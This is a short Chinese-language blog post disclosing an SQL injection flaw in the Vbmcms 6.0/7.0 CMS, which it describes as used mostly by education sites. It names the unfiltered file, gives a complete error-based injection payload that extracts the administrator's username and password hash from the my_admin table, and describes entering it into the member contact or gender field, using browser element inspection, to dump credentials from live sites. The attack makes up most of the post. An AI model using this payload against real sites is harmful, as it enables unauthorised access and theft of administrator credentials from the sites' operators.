Vbmcms6.0&&7.0 update注入漏洞

 

 

 

最新版本7.0

官网地址http://www.vbmcms.com/index.php

目测全是教育站

由于7.0版本收费  于是在网上下载了6.0免费版本的来看,还发现不少漏洞 各种insert 注入  各种update注入 但是我构造出语句后去网上找站测试都失败了  7.0补了很多

但是在修改联系方式这里没有过滤

 

漏洞文件\member\include\inc_base.php

sql

这里都没有过滤直接传入SQ语句

那么随便选一个  选cname吧

 

构造语句

 

UPDATE `vb_member` SET qq = ‘1141056911’, tel = ‘15071810222’ ,cname = ‘ɵµõ’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#’, email = ‘1141056911@qq.com’ , sex = ‘男’ ERE userid = ‘Sunshie’

 

2

 

 

 

然后来到会员中心  在联系方式 吧这里的联系老师  或者性别改成’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#(性别用谷歌审查元素修改)   

 

然后点提交

然后密码就爆出来了

sb

 

 

文 / admin
LEAVE A REPLY

loading